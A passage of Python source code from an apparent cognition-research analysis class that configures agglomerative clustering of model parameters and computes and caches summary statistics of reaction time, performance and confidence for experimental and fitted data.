affinity='euclidean', compute_full_tree=True,\n\t\t\t\t\t\tlinkage='ward', pooling_func=np.nanmean,connectivity=None):\n\t\t\"\"\"\n\t\tself.init_clusterer(n_clusters=2, affinity='euclidean', compute_full_tree=True,\n\t\t\t\t\t\tlinkage='ward', pooling_func=np.nanmean,connectivity=None)\n\t\t\n\t\tThis method constructs a sklearn.cluster.AgglomerativeClustering\n\t\tinstance using the call:\n\t\tsklearn.cluster.AgglomerativeClustering(n_clusters=n_clusters,\n\t\t\taffinity=affinity, compute_full_tree=compute_full_tree,\n\t\t\tlinkage=linkage, pooling_func=pooling_func,connectivity=connectivity)\n\t\t\n\t\tThe parameters used for the above mentioned construction are the\n\t\tinput parameters supplied to this function.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer = cluster.AgglomerativeClustering(n_clusters=n_clusters, affinity=affinity,\\\n\t\t\t\tconnectivity=connectivity,compute_full_tree=compute_full_tree, linkage=linkage,\\\n\t\t\t\tpooling_func=pooling_func)\n\t\tself.linkage = linkage\n\t\tself.affinity = affinity\n\t\tself.pooling_func=pooling_func\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef set_pooling_func(self,pooling_func):\n\t\t\"\"\"\n\t\tself.set_pooling_func(pooling_func)\n\t\t\n\t\tSet the pooling function used for parameter clustering.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer.set_params(**{'pooling_func':pooling_func})\n\t\tself.pooling_func = pooling_func\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef set_linkage(self,linkage):\n\t\t\"\"\"\n\t\tself.set_linkage(linkage)\n\t\t\n\t\tSet the linkage used for parameter clustering.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer.set_params(**{'linkage':linkage})\n\t\tself.linkage = linkage\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef set_affinity(self,affinity):\n\t\t\"\"\"\n\t\tself.set_affinity(affinity)\n\t\t\n\t\tSet the affinity used for parameter clustering.\n\t\t\n\t\t\"\"\"\n\t\tself.agg_clusterer.set_params(**{'affinity':affinity})\n\t\tself.affinity = affinity\n\t\tself.spanner = self.get_cluster_spanner()\n\t\n\tdef get_cluster_spanner(self):\n\t\t\"\"\"\n\t\tspanner = self.get_cluster_spanner()\n\t\t\n\t\tGet a callable that computes a given cluster's span. To compute\n\t\ta cluster's span, call\n\t\tspanner(cluster)\n\t\t\n\t\tThe cluster must be a 2D numpy array, where the axis=0 holds\n\t\tseparate cluster members and the axis=1 holds the different\n\t\tvariables.\n\t\t\n\t\t\"\"\"\n\t\tif self.linkage=='ward':\n\t\t\tif self.affinity=='euclidean':\n\t\t\t\tspanner = lambda x:np.sum((x-self.pooling_func(x,axis=0))**2)\n\t\t\telif self.affinity in ['l1','l2','manhattan','cosine']:\n\t\t\t\traise ValueError('Ward linkage only accepts euclidean affinity. However, affinity attribute was set to {0}.'.format(self.affinity))\n\t\t\telse:\n\t\t\t\traise AttributeError('Unknown affinity attribute value {0}.'.format(self.affinity))\n\t\telif self.linkage=='complete':\n\t\t\tif self.affinity=='euclidean':\n\t\t\t\tspanner = lambda x:np.max(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2))\n\t\t\telif self.affinity=='l1' or self.affinity=='manhattan':\n\t\t\t\tspanner = lambda x:np.max(np.sum(np.abs(x[:,None,:]-x[None,:,:]),axis=2))\n\t\t\telif self.affinity=='l2':\n\t\t\t\tspanner = lambda x:np.max(np.sqrt(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2)))\n\t\t\telif self.affinity=='cosine':\n\t\t\t\tspanner = lambda x:np.max(np.sum((x[:,None,:]*x[None,:,:]))/(np.sqrt(np.sum(x[:,None,:]*x[:,None,:],axis=2,keepdims=True))*np.sqrt(np.sum(x[None,:,:]*x[None,:,:],axis=2,keepdims=True))))\n\t\t\telse:\n\t\t\t\traise AttributeError('Unknown affinity attribute value {0}.'.format(self.affinity))\n\t\telif self.linkage=='average':\n\t\t\tif self.affinity=='euclidean':\n\t\t\t\tspanner = lambda x:np.mean(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2))\n\t\t\telif self.affinity=='l1' or self.affinity=='manhattan':\n\t\t\t\tspanner = lambda x:np.mean(np.sum(np.abs(x[:,None,:]-x[None,:,:]),axis=2))\n\t\t\telif self.affinity=='l2':\n\t\t\t\tspanner = lambda x:np.mean(np.sqrt(np.sum((x[:,None,:]-x[None,:,:])**2,axis=2)))\n\t\t\telif self.affinity=='cosine':\n\t\t\t\tspanner = lambda x:np.mean(np.sum((x[:,None,:]*x[None,:,:]))/(np.sqrt(np.sum(x[:,None,:]*x[:,None,:],axis=2,keepdims=True))*np.sqrt(np.sum(x[None,:,:]*x[None,:,:],axis=2,keepdims=True))))\n\t\t\telse:\n\t\t\t\traise AttributeError('Unknown affinity attribute value {0}.'.format(self.affinity))\n\t\telse:\n\t\t\traise AttributeError('Unknown linkage attribute value {0}.'.format(self.linkage))\n\t\treturn spanner\n\t\n\tdef get_summary_filename(self):\n\t\t\"\"\"\n\t\tself.get_summary_filename()\n\t\t\n\t\tSimply returns 'summary_{method}_{optimizer}_{cmap_meth}{suffix}.pkl'\n\t\tformated with the Analyzer instance's attribute values.\n\t\t\n\t\t\"\"\"\n\t\treturn 'summary_{method}_{optimizer}_{cmap_meth}{suffix}.pkl'.format(\n\t\t\t\tmethod=self.method,optimizer=self.optimizer,suffix=self.suffix,\n\t\t\t\tcmap_meth=self.cmap_meth)\n\t\n\tdef get_summary(self,override=False):\n\t\t\"\"\"\n\t\tself.get_summary(override=False)\n\t\t\n\t\tGet the experimental and theoretical summaries. The input\n\t\t'override', if True, signals that the method must compute the\n\t\tindividual summaries and then override the Analyzer's summary\n\t\tfilename. If False, this method first tries to load the\n\t\tsummaries from the Analyzer's summary filename, and if said file\n\t\tdoes not exist, it computes the summaries and then saves them.\n\t\t\n\t\tOutput:\n\t\t\tsummary: A dictionary with keys 'experimental' and 'theoretical'.\n\t\t\t\tEach key holds the output of the methods\n\t\t\t\tself.subjectSession_measures ('experimental' key) and\n\t\t\t\tself.fitter_measures ('theoretical' key), called for\n\t\t\t\tevery subject and session that complies with\n\t\t\t\tdata_io_cognition.filter_subjects_list(data_io_cognition.unique_subject_sessions(fits_cognition.raw_data_dir),'all_sessions_by_experiment')\n\t\t\n\t\t\"\"\"\n\t\tif override or not(os.path.exists(self.get_summary_filename()) and os.path.isfile(self.get_summary_filename())):\n\t\t\tsubjects = io.filter_subjects_list(io.unique_subject_sessions(fits.raw_data_dir),'all_sessions_by_experiment')\n\t\t\tself.summary = {'experimental':{},'theoretical':{}}\n\t\t\tfor s in subjects:\n\t\t\t\tprint(s.get_key())\n\t\t\t\tfname = fits.Fitter_filename(experiment=s.experiment,\n\t\t\t\t\t\t\t\t\t\t\t method=self.method,\n\t\t\t\t\t\t\t\t\t\t\t name=s.get_name(),\n\t\t\t\t\t\t\t\t\t\t\t session=s.get_session(),\n\t\t\t\t\t\t\t\t\t\t\t optimizer=self.optimizer,\n\t\t\t\t\t\t\t\t\t\t\t suffix=self.suffix,\n\t\t\t\t\t\t\t\t\t\t\t confidence_map_method=self.cmap_meth,\n\t\t\t\t\t\t\t\t\t\t\t fits_path=self.fits_path)\n\t\t\t\tif not(os.path.exists(fname) and os.path.isfile(fname)):\n\t\t\t\t\tcontinue\n\t\t\t\ts_measures = self.subjectSession_measures(s)\n\t\t\t\tself.summary['experimental'].update(s_measures)\n\t\t\t\tfitter = fits.load_Fitter_from_file(fname)\n\t\t\t\tf_measures = self.fitter_measures(fitter)\n\t\t\t\tself.summary['theoretical'].update(f_measures)\n\t\t\tf = open(self.get_summary_filename(),'w')\n\t\t\tpickle.dump(self.summary,f)\n\t\t\tf.close()\n\t\telse:\n\t\t\tf = open(self.get_summary_filename(),'r')\n\t\t\tself.summary = pickle.load(f)\n\t\t\tf.close()\n\t\treturn self.summary\n\t\n\tdef subjectSession_measures(self,subjectSession):\n\t\t\"\"\"\n\t\tself.subjectSession_measures(subjectSession)\n\t\t\n\t\tGet the summary statistics of a SubjectSession instance.\n\t\t\n\t\tOutput:\n\t\t\tstats: A dict with keys equal to\n\t\t\t\t'experiment_{experiment}_subject_{name}_session_{session}'\n\t\t\t\twhere experiment, name and session are the unique tuple\n\t\t\t\tvalues encountered in the subjectSession data.\n\t\t\t\tThe value assigned to each key is itself a dict with shape:\n\t\t\t\t{'experiment':...,'n':...,'auc':...,\n\t\t\t\t'name':...,'session':...,\n\t\t\t\t'means':{'rt':...,'performance':...,'confidence':...,\\\n\t\t\t\t\t\t'hit_rt':...,'miss_rt':...,\\\n\t\t\t\t\t\t'hit_confidence':...,'miss_confidence':...},\n\t\t\t\t'stds':{'rt':...,'performance':...,'confidence':...,\\\n\t\t\t\t\t\t'hit_rt':...,'miss_rt':...,\\\n\t\t\t\t\t\t'hit_confidence':...,'miss_confidence':...},\n\t\t\t\t'medians':{'rt':...,'confidence':...,\\\n\t\t\t\t\t\t'hit_rt':...,'miss_rt':...,\\\n\t\t\t\t\t\t'hit_confidence':...,'miss_confidence':...}}\n\t\t\n\t\t\"\"\"\n\t\tdata = subjectSession.load_data()\n\t\tunique_names = np.unique(data[:,-2].astype(np.int))\n\t\tunique_sessions = np.unique(data[:,-1].astype(np.int))\n\t\tout = {}\n\t\tfor un in unique_names:\n\t\t\tfor us in unique_sessions:\n\t\t\t\tinds = np.logical_and(data[:,-2]==un,data[:,-1]==us)\n\t\t\t\tif any(inds):\n\t\t\t\t\tn = np.sum(inds.astype(np.int))\n\t\t\t\t\tmeans = np.mean(data[inds,1:4],axis=0)\n\t\t\t\t\tmedians = np.median(data[inds,1:4],axis=0)\n\t\t\t\t\tstds = np.std(data[inds,1:4],axis=0)/np.sqrt(float(n))\n\t\t\t\t\tauc = io.compute_auc(io.compute_roc(data[inds,2],data[inds,3]))\n\t\t\t\t\thit = data[:,2]==1\n\t\t\t\t\tmiss = data[:,2]==0\n\t\t\t\t\tif any(hit):\n\t\t\t\t\t\tinds1 = np.logical_and(hit,inds)\n\t\t\t\t\t\thit_means = np.mean(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\thit_medians = np.median(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\thit_stds = np.std(data[inds1,1:4:2],axis=0)/np.sqrt(np.sum(inds1).astype(np.float))\n\t\t\t\t\telse:\n\t\t\t\t\t\thit_means = np.nan*np.ones(2)\n\t\t\t\t\t\thit_medians = np.nan*np.ones(2)\n\t\t\t\t\t\thit_stds = np.nan*np.ones(2)\n\t\t\t\t\tif any(miss):\n\t\t\t\t\t\tinds1 = np.logical_and(miss,inds)\n\t\t\t\t\t\tmiss_means = np.mean(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\tmiss_medians = np.median(data[inds1,1:4:2],axis=0)\n\t\t\t\t\t\tmiss_stds = np.std(data[inds1,1:4:2],axis=0)/np.sqrt(np.sum(inds1).astype(np.float))\n\t\t\t\t\telse:\n\t\t\t\t\t\tmiss_means = np.nan*np.ones(2)\n\t\t\t\t\t\tmiss_medians = np.nan*np.ones(2)\n\t\t\t\t\t\tmiss_stds = np.nan*np.ones(2)\n\t\t\t\t\tdipval = dip(data[inds,3], min_is_0=True, x_is_sorted=False)\n\t\t\t\t\tkey = '_'.join(['experiment_'+subjectSession.experiment,'subject_'+str(un),'session_'+str(us)])\n\t\t\t\t\tout[key] = {'experiment':subjectSession.experiment,'n':n,'auc':auc,\n\t\t\t\t\t\t\t\t'name':un,'session':us,'multi_mod_index':dipval,\n\t\t\t\t\t\t\t\t'means':{'rt':means[0],'performance':means[1],'confidence':means[2],\n\t\t\t\t\t\t\t\t\t\t'hit_rt':hit_means[0],'miss_rt':miss_means[0],\n\t\t\t\t\t\t\t\t\t\t'hit_confidence':hit_means[1],'miss_confidence':miss_means[1]},\n\t\t\t\t\t\t\t\t'stds':{'rt':stds[0],'performance':stds[1],'confidence':stds[2],\n\t\t\t\t\t\t\t\t\t\t'hit_rt':hit_stds[0],'miss_rt':miss_stds[0],\n\t\t\t\t\t\t\t\t\t\t'hit_confidence':hit_stds[1],'miss_confidence':miss_stds[1]},\n\t\t\t\t\t\t\t\t'medians':{'rt':medians[0],'confidence':medians[2],\n\t\t\t\t\t\t\t\t\t\t'hit_rt':hit_medians[0],'miss_rt':miss_medians[0],\n\t\t\t\t\t\t\t\t\t\t'hit_confidence':hit_medians[1],'miss_confidence':miss_medians[1]}}\n\t\treturn out\n\t\n\tdef fitter_measures(self,fitter):\n\t\t\"\"\"\n\t\tself.fitter_measures(fitter)\n\t\t\n\t\tGet the summary statistics of a Fitter instance.\n\t\t\n\t\tOutput:\n\t\t\tstats: A dict with keys equal to\n\t\t\t\t'experiment_{experiment}_subject_{name}_session_{session}'\n\t\t\t\twhere experiment, name and session are the Fitter\n\t\t\t\tinstance's experiment attribute,\n\t\t\t\tfitter.subjectSession.get_name() and\n\t\t\t\tfitter.subjectSession.get_session() returned values.\n\t\t\t\tThe value assigned to each key is itself a dict with shape:\n\t\t\t\t{'experiment':...,'parameters':...,'full_merit':...,\n\t\t\t\t'full_confidence_merit':...,'confidence_only_merit':...,\n\t\t\t\t'name':...,'session':...,\n\t\t\t\t'performance':...,'rt':...,'hit_rt':...,'miss_rt':...,\n\t\t\t\t'confidence':...,'hit_confidence':...,\n\t\t\t\t'miss_confidence':...,'auc':...}\n\t\t\n\t\t\"\"\"\n\t\tparameters = fitter.get_parameters_dict_from_fit_output()\n\t\tfull_confidence_merit = fitter.forced_compute_full_confidence_merit(parameters)\n\t\tfull_merit = fitter.forced_compute_full_merit(parameters)\n\t\tconfidence_only_merit = fitter.forced_compute_confidence_only_merit(parameters)\n\t\ttry:\n\t\t\t# First try to load the fitter stats from memory\n\t\t\tf = open(fitter.get_save_file_name().replace('.pkl','_stats.pkl'),'r')\n\t\t\tfitter_stats = pickle.load(f)\n\t\t\tf.close()\n\t\texcept:\n\t\t\t# If no stats file is found or the load fails, then compute the stats\n\t\t\tfitter_stats = fitter.stats(return_mean_rt=True,return_mean_confidence=True,return_median_rt=True,\n\t\t\t\t\treturn_median_confidence=True,return_std_rt=True,return_std_confidence=True,\n\t\t\t\t\treturn_auc=True)\n\t\t\n\t\tperformance = fitter_stats['performance']\n\t\tperformance_conditioned = fitter_stats['performance_conditioned']\n\t\tconfidence = fitter_stats['mean_confidence']\n\t\tconfidence_median = fitter_stats['median_confidence']\n\t\thit_confidence = fitter_stats['mean_confidence_conditioned'][0]\n\t\tmiss_confidence = fitter_stats['mean_confidence_conditioned'][1]\n\t\thit_confidence_median = fitter_stats['median_confidence_conditioned'][0]\n\t\tmiss_confidence_median = fitter_stats['median_confidence_conditioned'][1]\n\t\trt = fitter_stats['mean_rt']\n\t\tmean_rt_perf = fitter_stats['mean_rt_perf']\n\t\thit_rt = mean_rt_perf[0]\n\t\tmiss_rt = mean_rt_perf[1]\n\t\trt_median = fitter_stats['median_rt']\n\t\trt_median_perf = fitter_stats['median_rt_perf']\n\t\thit_rt_median = rt_median_perf[0]\n\t\tmiss_rt_median = rt_median_perf[1]\n\t\t\n\t\tauc = fitter_stats['auc']\n\t\t\n\t\tkey = 'experiment_'+fitter.experiment+'_subject_'+fitter.subjectSession.get_name()+'_session_'+fitter.subjectSession.get_session()\n\t\tout = {key:{'experiment':fitter.experiment,'parameters':parameters,'full_merit':full_merit,\n\t\t\t\t\t'full_confidence_merit':full_confidence_merit,'confidence_only_merit':confidence_only_merit,\n\t\t\t\t\t'name':fitter.subjectSession.get_name(),'session':fitter.subjectSession.get_session(),\n\t\t\t\t\t'performance_mean':performance,'rt_mean':rt,'hit_rt_mean':hit_rt,'miss_rt_mean':miss_rt,\n\t\t\t\t\t'confidence_mean':confidence,'hit_confidence_mean':hit_confidence,\n\t\t\t\t\t'miss_confidence_mean':miss_confidence,'rt_median':rt_median,\n\t\t\t\t\t'hit_rt_median':hit_rt_median,'miss_rt_median':miss_rt_median,\n\t\t\t\t\t'confidence_median':confidence_median,'hit_confidence_median':hit_confidence_median,\n\t\t\t\t\t'miss_confidence_median':miss_confidence_median,'auc':auc}}\n\t\treturn out\n\t\n\tdef get_parameter_array_from_summary(self,summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x)):\n\t\t\"\"\"\n\t\tself.get_parameter_array_from_summary(summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x))\n\t\t\n\t\tGet the array of parameters, experiments, sessions and names\n\t\tfrom the summary['theoretical'] dict.\n\t\t\n\t\tInput:\n\t\t\tsummary: A summary dict or None. If None, the Analyzer's\n\t\t\t\tsummary instance is used instead.\n\t\t\tnormalize: None or a dict whos keys are parameter names. If\n\t\t\t\tNone, no normalization is performed. If it is a dict,\n\t\t\t\tthe values indicate the grouping method that will be used\n\t\t\t\tto normalize the parameter values. Each group is then\n\t\t\t\tdivided by the output of a call to the normalization_function\n\t\t\t\ton itself. Four methods are available:\n\t\t\t\t'all': All parameters are taken into a single group.\n\t\t\t\t'experiment': One group for each experiment is formed.\n\t\t\t\t'session': One group for each session is formed.\n\t\t\t\t'name': One group for each name is formed.\n\t\t\t\tBy default normalize is {'internal_var':'experiment'}\n\t\t\t\tbecause the internal_var is completely different\n\t\t\t\tfor each experiment.\n\t\t\tnormalization_function: A callable that is passed to the\n\t\t\t\tmethod self.normalize_parameters in order to\n\t\t\t\tnormalize the Fitter parameters before returning them.\n\t\t\t\tThis function is only used if normalize is not None.\n\t\t\t\tRefer to self.normalize_parameters for more information.\n\t\t\n\t\tOutput:\n\t\t\tparameters: 2D numpy array. Axis=0 corresponds to different\n\t\t\t\texperiment, name and subject tuple values, while axis=1\n\t\t\t\tcorresponds to different parameter names.\n\t\t\tparameter_names: A list with the parameter names in the order\n\t\t\t\tin which they appear in the parameters output\n\t\t\tnames: A 1D numpy array with the SubjectSession names that\n\t\t\t\tcorrespond to each parameter.\n\t\t\tsessions: A 1D numpy array with the SubjectSession sessions\n\t\t\t\tthat correspond to each parameter.\n\t\t\texperiments: A 1D numpy array with the SubjectSession\n\t\t\t\texperiments that correspond to each parameter.\n\t\t\n\t\t\"\"\"\n\t\tif summary is None:\n\t\t\tsummary = self.summary\n\t\tparameter_dicts = []\n\t\tself._parameter_names = set([])\n\t\tself._experiments = []\n\t\tself._sessions = []\n\t\tself._names = []\n\t\tfor k in summary['theoretical'].keys():\n\t\t\tvals = summary['theoretical'][k]\n\t\t\ttry:\n\t\t\t\tself._names.append(int(vals['name']))\n\t\t\texcept:\n\t\t\t\tself._names.append(vals['name'])\n\t\t\ttry:\n\t\t\t\tself._sessions.append(int(vals['session']))\n\t\t\texcept:\n\t\t\t\tself._sessions.append(vals['session'])\n\t\t\tself._experiments.append(vals['experiment'])\n\t\t\tself._parameter_names = self._parameter_names | set(vals['parameters'].keys())\n\t\t\tparameter_dicts.append(vals['parameters'])\n\t\tself._parameter_names = sorted(list(self._parameter_names))\n\t\tself._parameters = []\n\t\tfor pd in parameter_dicts:\n\t\t\tvals = []\n\t\t\tfor pn in self._parameter_names:\n\t\t\t\tif pn=='high_confidence_threshold':\n\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\tval = pd[pn] if pd[pn]<=2. else np.nan\n\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\tval = pd[pn]+0.7/pd['confidence_map_slope']\n\t\t\t\t\t\t#~ val = pd[pn]\n\t\t\t\t\telse:\n\t\t\t\t\t\tval = pd[pn]\n\t\t\t\telif pn=='confidence_map_slope':\n\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\tval = pd[pn] if pd[pn]<=100. else np.nan\n\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\tval = pd[pn] if pd[pn]<=40. else np.nan\n\t\t\t\t\telse:\n\t\t\t\t\t\tval = pd[pn]\n\t\t\t\telse:\n\t\t\t\t\tval = pd[pn]\n\t\t\t\tvals.append(val)\n\t\t\tself._parameters.append(np.array(vals))\n\t\tself._parameters = np.array(self._parameters)\n\t\tself._names = np.array(self._names)\n\t\tself._sessions = np.array(self._sessions)\n\t\tself._experiments = np.array(self._experiments)\n\t\tif normalize:\n\t\t\tgroup_dict = {'all':None,\n\t\t\t\t\t\t 'experiment':self._experiments,\n\t\t\t\t\t\t 'session':self._sessions,\n\t\t\t\t\t\t 'name':self._names}\n\t\t\tfor par in normalize.keys():\n\t\t\t\tpar_ind = self._parameter_names.index(par)\n\t\t\t\tgroup = group_dict[normalize[par]]\n\t\t\t\tself._parameters[:,par_ind] = self.normalize_parameters(parameters=self._parameters[:,par_ind],\n\t\t\t\t\t\t\t\t\t group=group, normalization_function=normalization_function)\n\t\treturn self._parameters,self._parameter_names,self._names,self._sessions,self._experiments\n\t\n\tdef get_summary_stats_array(self,summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x)):\n\t\t\"\"\"\n\t\tself.get_summary_stats_array(summary=None,normalize={'internal_var':'experiment'},normalization_function=lambda x: x/np.nanstd(x))\n\t\t\n\t\tGet the two numpy arrays of the summary statistics. One for the\n\t\texperimental data and another for the theoretical data.\n\t\t\n\t\tInput:\n\t\t\tsummary: A summary dict or None. If None, the Analyzer's\n\t\t\t\tsummary instance is used instead.\n\t\t\tnormalize: None or a dict whos keys are parameter names. If\n\t\t\t\tNone, no normalization is performed. If it is a dict,\n\t\t\t\tthe values indicate the grouping method that will be used\n\t\t\t\tto normalize the parameter values. Each group is then\n\t\t\t\tdivided by the output of a call to the normalization_function\n\t\t\t\ton itself. Four methods are available:\n\t\t\t\t'all': All parameters are taken into a single group.\n\t\t\t\t'experiment': One group for each experiment is formed.\n\t\t\t\t'session': One group for each session is formed.\n\t\t\t\t'name': One group for each name is formed.\n\t\t\t\tBy default normalize is {'internal_var':'experiment'}\n\t\t\t\tbecause the internal_var is completely different\n\t\t\t\tfor each experiment.\n\t\t\tnormalization_function: A callable that is passed to the\n\t\t\t\tmethod self.normalize_parameters in order to\n\t\t\t\tnormalize the Fitter parameters before returning them.\n\t\t\t\tThis function is only used if normalize is not None.\n\t\t\t\tRefer to self.normalize_parameters for more information.\n\t\t\n\t\tOutput:\n\t\t\t(experimental,theoretical): Two numpy arrays with named\n\t\t\t\tfields. It is posible to access the field names from the\n\t\t\t\tattribute experimental.dtype.names.\n\t\t\t\tThe two arrays have different field names, except for a\n\t\t\t\tfew. The most important are 'experiment', 'session' and\n\t\t\t\t'name' which encode the corresponding experiment, session\n\t\t\t\tand subject name. These fields should be used to get the\n\t\t\t\tcorresponding experimental and theoretical entries.\n\t\t\t\t\n\t\t\t\tList of experimental entries:\n\t\t\t\t- experiment: Experiment\n\t\t\t\t- name: Subject Name\n\t\t\t\t- session: Session\n\t\t\t\t- n: Number of trials\n\t\t\t\t- auc: Area under to ROC curve\n\t\t\t\t- multi_mod_index: Hartigan's dip test statistic\n\t\t\t\t- rt_mean: Mean RT\n\t\t\t\t- hit_rt_mean: Mean RT for the correct trials\n\t\t\t\t- miss_rt_mean: Mean RT for the incorrect trials\n\t\t\t\t- performance_mean: Mean performance\n\t\t\t\t- confidence_mean: Mean confidence\n\t\t\t\t- hit_confidence_mean: Mean confidence for the correct trials\n\t\t\t\t- miss_confidence_mean: Mean confidence for the incorrect trials\n\t\t\t\t- rt_std: Standard deviation of RT\n\t\t\t\t- hit_rt_std: Standard deviation of RT for the correct trials\n\t\t\t\t- miss_rt_std: Standard deviation of RT for the incorrect trials\n\t\t\t\t- performance_std: Standard deviation of performance\n\t\t\t\t- confidence_std: Standard deviation of confidence\n\t\t\t\t- hit_confidence_std: Standard deviation of confidence for the correct trials\n\t\t\t\t- miss_confidence_std: Standard deviation of confidence for the incorrect trials\n\t\t\t\t- rt_median: Median RT\n\t\t\t\t- hit_rt_median: Median RT for the correct trials\n\t\t\t\t- miss_rt_median: Median RT for the incorrect trials\n\t\t\t\t- confidence_median: Median confidence\n\t\t\t\t- hit_confidence_median: Median confidence for the correct trials\n\t\t\t\t- miss_confidence_median: Median confidence for the incorrect trials\n\t\t\t\t\n\t\t\t\tList of theoretical entries:\n\t\t\t\t- experiment: Experiment\n\t\t\t\t- name: Subject Name\n\t\t\t\t- session: Session\n\t\t\t\t- full_merit: Fitter full_merit value\n\t\t\t\t- full_confidence_merit: Fitter full_confidence_merit value\n\t\t\t\t- confidence_only_merit: Fitter confidence_only_merit value\n\t\t\t\t- auc: Area under to ROC curve\n\t\t\t\t- rt_mean: Mean RT\n\t\t\t\t- hit_rt_mean: Mean RT for the correct trials\n\t\t\t\t- miss_rt_mean: Mean RT for the incorrect trials\n\t\t\t\t- performance_mean: Mean performance\n\t\t\t\t- confidence_mean: Mean confidence\n\t\t\t\t- hit_confidence_mean: Mean confidence for the correct trials\n\t\t\t\t- miss_confidence_mean: Mean confidence for the incorrect trials\n\t\t\t\t- rt_median: Median RT\n\t\t\t\t- hit_rt_median: Median RT for the correct trials\n\t\t\t\t- miss_rt_median: Median RT for the incorrect trials\n\t\t\t\t- confidence_median: Median confidence\n\t\t\t\t- hit_confidence_median: Median confidence for the correct trials\n\t\t\t\t- miss_confidence_median: Median confidence for the incorrect trials\n\t\t\t\t- cost: Fitter 'cost' parameter value\n\t\t\t\t- internal_var: Fitter 'internal_var' parameter value\n\t\t\t\t- phase_out_prob: Fitter 'phase_out_prob' parameter value\n\t\t\t\t- dead_time: Fitter 'dead_time' parameter value\n\t\t\t\t- dead_time_sigma: Fitter 'dead_time_sigma' parameter value\n\t\t\t\t- high_confidence_threshold: Fitter 'high_confidence_threshold' parameter value\n\t\t\t\t- confidence_map_slope: Fitter 'confidence_map_slope' parameter value\n\t\t\n\t\t\"\"\"\n\t\tif summary is None:\n\t\t\tsummary = self.get_summary()\n\t\t\n\t\texperimental = []\n\t\texperimental_ind_names = []\n\t\ttheoretical = []\n\t\ttheoretical_ind_names = []\n\t\tmax_experiment_len = 0\n\t\tmax_name_len = 0\n\t\tparameter_names = []\n\t\tmissing_fit = []\n\t\tfor counter,k in enumerate(summary['experimental'].keys()):\n\t\t\texp = summary['experimental'][k]\n\t\t\tfor exp_k in exp.keys():\n\t\t\t\tif exp_k=='experiment':\n\t\t\t\t\tmax_experiment_len = max([max_experiment_len,len(exp[exp_k])])\n\t\t\t\telif exp_k=='name':\n\t\t\t\t\tmax_name_len = max([max_name_len,len(str(exp[exp_k]))])\n\t\t\t\tif exp_k not in ['means','stds','medians']:\n\t\t\t\t\tif exp_k not in experimental_ind_names:\n\t\t\t\t\t\texperimental_ind_names.append(exp_k)\n\t\t\t\t\t\texperimental.append([exp[exp_k]])\n\t\t\t\t\telse:\n\t\t\t\t\t\texperimental[experimental_ind_names.index(exp_k)].append(exp[exp_k])\n\t\t\t\telse:\n\t\t\t\t\tfor nested_key in exp[exp_k].keys():\n\t\t\t\t\t\tcomposed_key = nested_key+{'means':'_mean','stds':'_std','medians':'_median'}[exp_k]\n\t\t\t\t\t\tif composed_key not in experimental_ind_names:\n\t\t\t\t\t\t\texperimental_ind_names.append(composed_key)\n\t\t\t\t\t\t\texperimental.append([exp[exp_k][nested_key]])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\texperimental[experimental_ind_names.index(composed_key)].append(exp[exp_k][nested_key])\n\t\t\ttry:\n\t\t\t\tteo = summary['theoretical'][k]\n\t\t\texcept:\n\t\t\t\tmissing_fit.append(counter)\n\t\t\t\tcontinue\n\t\t\tfor teo_k in teo.keys():\n\t\t\t\tif teo_k=='experiment':\n\t\t\t\t\tmax_experiment_len = max([max_experiment_len,len(teo[teo_k])])\n\t\t\t\telif teo_k=='name':\n\t\t\t\t\tmax_name_len = max([max_name_len,len(str(teo[teo_k]))])\n\t\t\t\tif teo_k!='parameters':\n\t\t\t\t\tif teo_k not in theoretical_ind_names:\n\t\t\t\t\t\ttheoretical_ind_names.append(teo_k)\n\t\t\t\t\t\ttheoretical.append([teo[teo_k]])\n\t\t\t\t\telse:\n\t\t\t\t\t\ttheoretical[theoretical_ind_names.index(teo_k)].append(teo[teo_k])\n\t\t\t\telse:\n\t\t\t\t\tfor par in teo[teo_k].keys():\n\t\t\t\t\t\tpar = str(par)\n\t\t\t\t\t\tif par=='high_confidence_threshold':\n\t\t\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par] if teo[teo_k][par]<=2. else np.nan\n\t\t\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par]+0.7/teo[teo_k]['confidence_map_slope']\n\t\t\t\t\t\t\t\t#~ val = teo[teo_k][par]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tval = teo[teo_k][par]\n\t\t\t\t\t\telif par=='confidence_map_slope':\n\t\t\t\t\t\t\tif self.cmap_meth=='log_odds':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par] if teo[teo_k][par]<=100. else np.nan\n\t\t\t\t\t\t\telif self.cmap_meth=='belief':\n\t\t\t\t\t\t\t\tval = teo[teo_k][par] if teo[teo_k][par]<=40. else np.nan\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tval = teo[teo_k][par]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tval = teo[teo_k][par]\n\t\t\t\t\t\tif par not in parameter_names:\n\t\t\t\t\t\t\tparameter_names.append(par)\n\t\t\t\t\t\t\ttheoretical_ind_names.append(par)\n\t\t\t\t\t\t\ttheoretical.append([val])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttheoretical[theoretical_ind_names.index(par)].append(val)\n\t\tfor ind in missing_fit:\n\t\t\texperiment = experimental[experimental_ind_names.index('experiment')][ind]\n\t\t\tsession = 